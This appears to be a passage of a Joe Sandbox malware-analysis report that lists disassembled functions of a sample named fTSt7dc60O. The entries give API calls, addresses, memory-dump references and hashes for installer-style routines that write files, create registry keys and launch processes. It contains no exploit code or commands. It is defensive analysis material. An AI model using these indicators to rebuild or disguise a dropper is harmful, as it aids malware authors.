                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID:
                                                      • API String ID: 3808545654-0
                                                      • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                      • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                      • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                      • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                      Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                      • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                      • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                      • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                      Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403192
                                                        • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                      • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                      • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$CountTickWrite
                                                      • String ID:
                                                      • API String ID: 2146148272-0
                                                      • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                      • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                      • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                      • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                      Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                      • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID:
                                                      • API String ID: 1356686001-0
                                                      • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                      • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                      • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                      • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                      Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,771B2EE0,004057F0,?,00436800,771B2EE0,00434000), ref: 00405A4C
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                      • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                      • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                      • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3751793516-0
                                                      • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                      • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                      • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                      • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                      Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 1404258612-0
                                                      • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                      • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                      • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                      • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                      Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                        • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                        • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 3585118688-0
                                                      • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                      • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                      • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                      • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                      Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00405195
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                        • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                      • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                      • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                      • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                      Function 00405BE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405C01
                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: nsa
                                                      • API String ID: 1716503409-2209301699
                                                      • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                      • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                      • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                      • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                      Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                      • CloseHandle.KERNEL32(?), ref: 004056F5
                                                      Strings
                                                      • Error launching installer, xrefs: 004056D6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                      • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                      • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                      • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                      Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                      • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                      • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                      • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                      Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                      • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                      • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                      • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                      Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                      • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                      • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                      • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                      Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                      • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                      • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                      • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                      Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                      • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                      • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                      • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                      Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                      • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                      • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                      • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                      Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                      • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                      • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                      • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                      Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                      • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                      • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                      • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
